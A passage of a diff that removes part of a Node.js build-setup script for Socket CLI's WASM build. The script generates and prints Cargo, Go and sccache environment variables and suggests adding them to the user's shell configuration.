- */ -async function generateEnvVars() { - const hasSccache = checkSccache() - const cpuCount = getCpuCount() - const cacheDir = path.join(homedir(), '.cache') - - const envVars = { - // Cargo parallel builds. - CARGO_BUILD_JOBS: cpuCount.toString(), - - // Go cache. - GOCACHE: path.join(cacheDir, 'go-build'), - - // Rust incremental compilation cache. - CARGO_INCREMENTAL: '1', - - // Target directory (for consistency). - CARGO_TARGET_DIR: 'target', - } - - // Add sccache if available. - if (hasSccache) { - envVars.RUSTC_WRAPPER = 'sccache' - envVars.SCCACHE_DIR = path.join(cacheDir, 'sccache') - } - - return envVars -} - -/** - * Main entry point. - */ -async function main() { - if (!isExportMode) { - logger.step('WASM Build Environment Setup') - logger.substep('Checking build tools and configuration\n') - } - - const envVars = await generateEnvVars() - - if (isExportMode) { - // Export mode: output shell commands. - for (const [key, value] of Object.entries(envVars)) { - logger.log(`export ${key}="${value}"`) - } - return - } - - // Interactive mode: show configuration. - logger.info('Recommended environment variables:\n') - for (const [key, value] of Object.entries(envVars)) { - logger.substep(`${key}=${value}`) - } - - // Check shell config. - const configFile = await setupShellConfig() - if (!configFile) { - logger.info('\nAdd these to your shell configuration manually.') - return - } - - logger.info(`\nTo apply these settings automatically, add to ${configFile}:\n`) - - // Generate shell script snippet. - const shellScript = [ - '# Socket CLI WASM Build Optimizations', - '# Generated by scripts/wasm/setup-build-env.mjs', - '', - ] - - for (const [key, value] of Object.entries(envVars)) { - shellScript.push(`export ${key}="${value}"`) - } - - shellScript.push('') - - logger.substep(shellScript.join('\n')) - - // Check if already configured. 
- if (existsSync(configFile)) { - const content = await fs.readFile(configFile, 'utf-8') - if (content.includes('Socket CLI WASM Build Optimizations')) { - logger.success('\nAlready configured in shell config') - return - } - } - - logger.info('\nTo append automatically, run:') - logger.substep( - `node scripts/wasm/setup-build-env.mjs --export >> ${configFile}`, - ) - logger.substep(`source ${configFile}`) -} - -main().catch(e => { - if (!isExportMode) { - logger.error('Setup failed:', e) - } - process.exit(1) -})